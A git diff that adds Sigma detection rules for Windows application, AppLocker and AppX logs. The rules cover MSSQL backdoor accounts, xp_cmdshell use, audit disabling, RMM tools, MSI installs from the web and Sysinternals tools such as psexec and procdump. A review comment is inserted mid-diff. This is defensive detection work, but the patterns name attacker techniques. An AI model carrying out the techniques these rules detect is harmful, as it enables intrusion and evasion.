diff --git a/tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml
new file mode 100644
index 000000000..25e7b85f5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml
@@ -0,0 +1,27 @@
+title: Backup Catalog Deleted
+id: 9703792d-fd9a-456d-a672-ff92efe4806a
+status: test
+description: Detects backup catalog deletions
+references:
+ - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx
+ - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
+author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)
+date: 2017/05/12
+modified: 2022/12/25
+tags:
+ - attack.defense_evasion
+ - attack.t1070.004
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ EventID: 524
+ Provider_Name: Microsoft-Windows-Backup
+ condition: application and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml
new file mode 100644
index 000000000..e92e1b0e6
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml
@@ -0,0 +1,31 @@
+title: Restricted Software Access By SRP
+id: b4c8da4a-1c12-46b0-8a2b-0a8521d03442
+status: test
+description: Detects restricted access to applications by the Software Restriction Policies (SRP) policy
+references:
+ - https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies
+ - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
+author: frack113
+date: 2023/01/12
+tags:
+ - attack.defense_evasion
+ - attack.t1072
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: Microsoft-Windows-SoftwareRestrictionPolicies
+ EventID:
+ - 865 # Access to %1 has been restricted by your Administrator by the default software restriction policy level
+ - 866 # Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3.
+ - 867 # Access to %1 has been restricted by your Administrator by software publisher policy.
+ - 868 # Access to %1 has been restricted by your Administrator by policy rule %2.
+ - 882 # Access to %1 has been restricted by your Administrator by policy rule %2.
+ condition: application and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml
new file mode 100644
index 000000000..4bd0a5a1a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml
@@ -0,0 +1,27 @@
+title: Application Uninstalled
+id: 570ae5ec-33dc-427c-b815-db86228ad43e
+status: test
+description: An application has been removed. Check if it is critical.
+author: frack113
+date: 2022/01/28
+modified: 2022/09/17
+tags:
+ - attack.impact
+ - attack.t1489
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MsiInstaller
+ EventID:
+ - 11724
+ - 1034
+ condition: application and selection
+falsepositives:
+ - Unknown
+# Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml
new file mode 100644
index 000000000..9478ade79
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml
@@ -0,0 +1,41 @@
+title: MSI Installation From Suspicious Locations
+id: c7c8aa1c-5aff-408e-828b-998e3620b341
+status: test
+description: Detects MSI package installation from suspicious locations
+references:
+ - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/08/31
+modified: 2023/10/23
+tags:
+ - attack.execution
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MsiInstaller
+ EventID:
+ - 1040
+ - 1042
+ Data|contains:
+ # Add more suspicious paths
+ - :\Windows\TEMP\
+ - \\\\
+ - \Desktop\
+ - \PerfLogs\
+ - \Users\Public\
+ # - '\AppData\Local\Temp\' # too many FPs
+ # - '\Downloads\' # too many FPs, typical legitimate staging directory
+ filter_winget:
+ Data|contains: \AppData\Local\Temp\WinGet\
+ filter_updhealthtools:
+ Data|contains: C:\Windows\TEMP\UpdHealthTools.msi
+ condition: application and (selection and not 1 of filter_*)
+falsepositives:
+ - False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use.
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml
new file mode 100644
index 000000000..f0c178ed5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml
@@ -0,0 +1,31 @@
+title: MSI Installation From Web
+id: 5594e67a-7f92-4a04-b65d-1a42fd824a60
+status: test
+description: Detects installation of a remote msi file from web.
+references:
+ - https://twitter.com/_st0pp3r_/status/1583922009842802689
+author: Stamatis Chatzimangou
+date: 2022/10/23
+modified: 2022/10/23
+tags:
+ - attack.execution
+ - attack.t1218
+ - attack.t1218.007
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MsiInstaller
+ EventID:
+ - 1040
+ - 1042
+ Data|contains: ://
+ condition: application and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml
new file mode 100644
index 000000000..b695e6db2
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml
@@ -0,0 +1,26 @@
+title: Atera Agent Installation
+id: 87261fb2-69d0-42fe-b9de-88c6b5f65a43
+status: test
+description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
+references:
+ - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent
+author: Bhabesh Raj
+date: 2021/09/01
+modified: 2022/12/25
+tags:
+ - attack.t1219
+logsource:
+ service: application
+ product: windows
+detection:
+ application:
+ Channel: Application
+ selection:
+ EventID: 1033
+ Provider_Name: MsiInstaller
+ Message|contains: AteraAgent
+ condition: application and selection
+falsepositives:
+ - Legitimate Atera agent installation
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml
new file mode 100644
index 000000000..3bcadd343
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml
@@ -0,0 +1,29 @@
+title: MSSQL Add Account To Sysadmin Role
+id: 08200f85-2678-463e-9c32-88dce2f073d1
+status: test
+description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
+references:
+ - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/13
+tags:
+ - attack.persistence
+logsource:
+ product: windows
+ service: application
+ definition: MSSQL audit policy must be enabled in order to receive this event in the application log
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 33205
+ Data|contains|all:
+ - object_name:sysadmin
+ - 'statement:alter server role [sysadmin] add member '
+ condition: application and selection
+falsepositives:
+ - Rare legitimate administrative activity
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml
new file mode 100644
index 000000000..298387a03
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml
@@ -0,0 +1,31 @@
+title: MSSQL Disable Audit Settings
+id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
+status: test
+description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
+references:
+ - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16
+ - https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/13
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: application
+ definition: MSSQL audit policy must be enabled in order to receive this event in the application log
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 33205
+ Data|contains:
+ - statement:ALTER SERVER AUDIT
+ - statement:DROP SERVER AUDIT
+ condition: application and selection
+falsepositives:
+ - This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml
new file mode 100644
index 000000000..970cf5f14
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml
@@ -0,0 +1,30 @@
+title: MSSQL Server Failed Logon
+id: 218d2855-2bba-4f61-9c85-81d0ea63ac71
+related:
+ - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d
+ type: similar
+status: experimental
+description: Detects failed logon attempts from clients to MSSQL server.
+author: Nasreddine Bencherchali (Nextron Systems), j4son
+date: 2023/10/11
+references:
+ - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/
+ - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html
+tags:
+ - attack.credential_access
+ - attack.t1110
+logsource:
+ product: windows
+ service: application
+ definition: 'Requirements: Must enable MSSQL authentication.'
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 18456
+ condition: application and selection
+falsepositives:
+ - This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml
new file mode 100644
index 000000000..ef8d21ed4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml
@@ -0,0 +1,52 @@
+title: MSSQL Server Failed Logon From External Network
+id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d
+related:
+ - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71
+ type: similar
+status: experimental
+description: Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.
+author: j4son
+date: 2023/10/11
+references:
+ - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/
+ - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html
+tags:
+ - attack.credential_access
+ - attack.t1110
+logsource:
+ product: windows
+ service: application
+ definition: 'Requirements: Must enable MSSQL authentication.'
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 18456
+ filter_main_local_ips:
+ Data|contains:
+ - 'CLIENT: 10.' # filter_range_IP: 10.0.0.0/8
+ - 'CLIENT: 172.16.' # filter_range_IP: 172.16.0.0/12
+ - 'CLIENT: 172.17.'
+ - 'CLIENT: 172.18.'
+ - 'CLIENT: 172.19.'
+ - 'CLIENT: 172.20.'
+ - 'CLIENT: 172.21.'
+ - 'CLIENT: 172.22.'
+ - 'CLIENT: 172.23.'
+ - 'CLIENT: 172.24.'
+ - 'CLIENT: 172.25.'
+ - 'CLIENT: 172.26.'
+ - 'CLIENT: 172.27.'
+ - 'CLIENT: 172.28.'
+ - 'CLIENT: 172.29.'
+ - 'CLIENT: 172.30.'
+ - 'CLIENT: 172.31.'
+ - 'CLIENT: 192.168.' # filter_range_IP: 192.168.0.0/16
+ - 'CLIENT: 127.' # filter_loop_back: 127.0.0.0/8
+ - 'CLIENT: 169.254.' # fileter_link-local_addressing: 169.254.0.0/16
+ condition: application and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml
new file mode 100644
index 000000000..bf3ad3fc7
--- /dev/null
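Review bot: `filter_main_local_ips` only recognises IPv4 client prefixes, so any 18456 event whose message does not carry an IPv4 address is treated as external and raised at medium level: local connections, which SQL Server reports in the message as `[CLIENT: <local machine>]` (and, I believe, `<named pipe>` for pipe connections), and IPv6 loopback or link-local clients. Adding `- 'CLIENT: <local machine>'`, `- 'CLIENT: ::1'` and `- 'CLIENT: fe80:'` to the list would close that gap; the exact message forms should be confirmed against an instance's own Application log before relying on them. The comment `# fileter_link-local_addressing` also misspells `filter`.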
+++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml
@@ -0,0 +1,30 @@
+title: MSSQL SPProcoption Set
+id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964
+status: test
+description: Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started
+references:
+ - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/13
+tags:
+ - attack.persistence
+logsource:
+ product: windows
+ service: application
+ definition: MSSQL audit policy to monitor for 'sp_procoption' must be enabled in order to receive this event in the application log
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 33205
+ Data|contains|all:
+ - object_name:sp_procoption
+ - statement:EXEC
+ condition: application and selection
+falsepositives:
+ - Legitimate use of the feature by administrators (rare)
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml
new file mode 100644
index 000000000..6ad6865d4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml
@@ -0,0 +1,31 @@
+title: MSSQL XPCmdshell Suspicious Execution
+id: 7f103213-a04e-4d59-8261-213dddf22314
+status: test
+description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
+references:
+ - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/12
+tags:
+ - attack.execution
+logsource:
+ product: windows
+ service: application
+ definition: MSSQL audit policy to monitor for 'xp_cmdshell' must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012)
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 33205
+ Data|contains|all:
+ # You can modify this to include specific commands
+ - object_name:xp_cmdshell
+ - statement:EXEC
+ condition: application and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml
new file mode 100644
index 000000000..bff8d735d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml
@@ -0,0 +1,28 @@
+title: MSSQL XPCmdshell Option Change
+id: d08dd86f-681e-4a00-a92c-1db218754417
+status: test
+description: Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed
+references:
+ - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/12
+tags:
+ - attack.execution
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 15457
+ Data|contains: xp_cmdshell
+ condition: application and selection
+falsepositives:
+ - Legitimate enable/disable of the setting
+ - Note that since the event contain the change for both values. This means that this will trigger on both enable and disable
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml
new file mode 100644
index 000000000..f00075407
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml
@@ -0,0 +1,30 @@
+title: Remote Access Tool - ScreenConnect Command Execution
+id: 076ebe48-cc05-4d8f-9d41-89245cd93a14
+related:
+ - id: b1f73849-6329-4069-bc8f-78a604bb8b23
+ type: similar
+status: experimental
+description: Detects command execution via ScreenConnect RMM
+references:
+ - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling
+ - https://github.com/SigmaHQ/sigma/pull/4467
+author: Ali Alwashali
+date: 2023/10/10
+tags:
+ - attack.execution
+ - attack.t1059.003
+logsource:
+ service: application
+ product: windows
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: ScreenConnect
+ EventID: 200
+ Data|contains: Executed command of length
+ condition: application and selection
+falsepositives:
+ - Legitimate use of ScreenConnect
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml
new file mode 100644
index 000000000..7de1939eb
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml
@@ -0,0 +1,30 @@
+title: Remote Access Tool - ScreenConnect File Transfer
+id: 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13
+related:
+ - id: b1f73849-6329-4069-bc8f-78a604bb8b23
+ type: similar
+status: experimental
+description: Detects file being transferred via ScreenConnect RMM
+references:
+ - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling
+ - https://github.com/SigmaHQ/sigma/pull/4467
+author: Ali Alwashali
+date: 2023/10/10
+tags:
+ - attack.execution
+ - attack.t1059.003
+logsource:
+ service: application
+ product: windows
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: ScreenConnect
+ EventID: 201
+ Data|contains: Transferred files with action
+ condition: application and selection
+falsepositives:
+ - Legitimate use of ScreenConnect
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml b/tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml
new file mode 100644
index 000000000..d711bf9ba
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml
@@ -0,0 +1,32 @@
+title: Microsoft Malware Protection Engine Crash - WER
+id: 6c82cf5c-090d-4d57-9188-533577631108
+status: experimental
+description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
+references:
+ - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
+ - https://technet.microsoft.com/en-us/library/security/4022344
+author: Florian Roth (Nextron Systems)
+date: 2017/05/09
+modified: 2023/04/14
+tags:
+ - attack.defense_evasion
+ - attack.t1211
+ - attack.t1562.001
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: Windows Error Reporting
+ EventID: 1001
+ Data|contains|all:
+ - MsMpEng.exe
+ - mpengine.dll
+ condition: application and selection
+falsepositives:
+ - MsMpEng might crash if the "C:\" partition is full
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml b/tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml
new file mode 100644
index 000000000..a6d7b1156
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml
@@ -0,0 +1,49 @@
+title: File Was Not Allowed To Run
+id: 401e5d00-b944-11ea-8f9a-00163ecd60ae
+status: test
+description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
+references:
+ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker
+ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker
+ - https://nxlog.co/documentation/nxlog-user-guide/applocker.html
+author: Pushkarev Dmitry
+date: 2020/06/28
+modified: 2021/11/27
+tags:
+ - attack.execution
+ - attack.t1204.002
+ - attack.t1059.001
+ - attack.t1059.003
+ - attack.t1059.005
+ - attack.t1059.006
+ - attack.t1059.007
+logsource:
+ product: windows
+ service: applocker
+detection:
+ applocker:
+ Channel:
+ - Microsoft-Windows-AppLocker/MSI and Script
+ - Microsoft-Windows-AppLocker/EXE and DLL
+ - Microsoft-Windows-AppLocker/Packaged app-Deployment
+ - Microsoft-Windows-AppLocker/Packaged app-Execution
+ selection:
+ EventID:
+ - 8004
+ - 8007
+ - 8022
+ - 8025
+ condition: applocker and selection
+fields:
+ - PolicyName
+ - RuleId
+ - RuleName
+ - TargetUser
+ - TargetProcessId
+ - FilePath
+ - FileHash
+ - Fqbn
+falsepositives:
+ - Need tuning applocker or add exceptions in SIEM
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml b/tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml
new file mode 100644
index 000000000..a7570e1a5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml
@@ -0,0 +1,31 @@
+title: Sysinternals Tools AppX Versions Execution
+id: d29a20b2-be4b-4827-81f2-3d8a59eab5fc
+status: experimental
+description: Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths
+references:
+ - Internal Research
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/16
+modified: 2023/09/12
+tags:
+ - attack.defense_evasion
+ - attack.execution
+logsource:
+ product: windows
+ service: appmodel-runtime
+detection:
+ appmodel_runtime:
+ Channel: Microsoft-Windows-AppModel-Runtime/Admin
+ selection:
+ EventID: 201
+ ImageName:
+ - procdump.exe
+ - psloglist.exe
+ - psexec.exe
+ - livekd.exe
+ - ADExplorer.exe
+ condition: appmodel_runtime and selection
+falsepositives:
+ - Legitimate usage of the applications from the Windows Store
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml
new file mode 100644
index 000000000..bab04a7e8
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml
@@ -0,0 +1,24 @@
+title: Deployment AppX Package Was Blocked By AppLocker
+id: 6ae53108-c3a0-4bee-8f45-c7591a2c337f
+status: test
+description: Detects an appx package deployment that was blocked by AppLocker policy
+references:
+ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
+ - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
+author: frack113
+date: 2023/01/11
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: appxdeployment-server
+detection:
+ appxdeployment_server:
+ Channel: Microsoft-Windows-AppXDeploymentServer/Operational
+ selection:
+ EventID: 412
+ condition: appxdeployment_server and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml
new file mode 100644
index 000000000..d19949cf8
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml
@@ -0,0 +1,31 @@
+title: Potential Malicious AppX Package Installation Attempts
+id: 09d3b48b-be17-47f5-bf4e-94e7e75d09ce
+status: test
+description: Detects potential installation or installation attempts of known malicious appx packages
+references:
+ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
+ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
+ - https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/11
+modified: 2023/01/12
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: appxdeployment-server
+detection:
+ appxdeployment_server:
+ Channel: Microsoft-Windows-AppXDeploymentServer/Operational
+ selection:
+ EventID:
+ - 400
+ - 401
+ # Add more malicious package names
+ # TODO: Investigate the packages here https://github.com/sophoslabs/IoCs/blob/master/Troj-BazarBackdoor.csv based on this report https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
+ PackageFullName|contains: 3669e262-ec02-4e9d-bcb4-3d008b4afac9
+ condition: appxdeployment_server and selection
+falsepositives:
+ - Rare occasions where a malicious package uses the exact same name and version as a legtimate application
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml
new file mode 100644
index 000000000..99d4f86f5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml
@@ -0,0 +1,28 @@
+title: Deployment Of The AppX Package Was Blocked By The Policy
+id: e021bbb5-407f-41f5-9dc9-1864c45a7a51
+status: test
+description: Detects an appx package deployment that was blocked by the local computer policy
+references:
+ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
+ - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
+author: frack113
+date: 2023/01/11
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: appxdeployment-server
+detection:
+ appxdeployment_server:
+ Channel: Microsoft-Windows-AppXDeploymentServer/Operational
+ selection:
+ EventID:
+ - 441
+ - 442
+ - 453
+ - 454
+ condition: appxdeployment_server and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
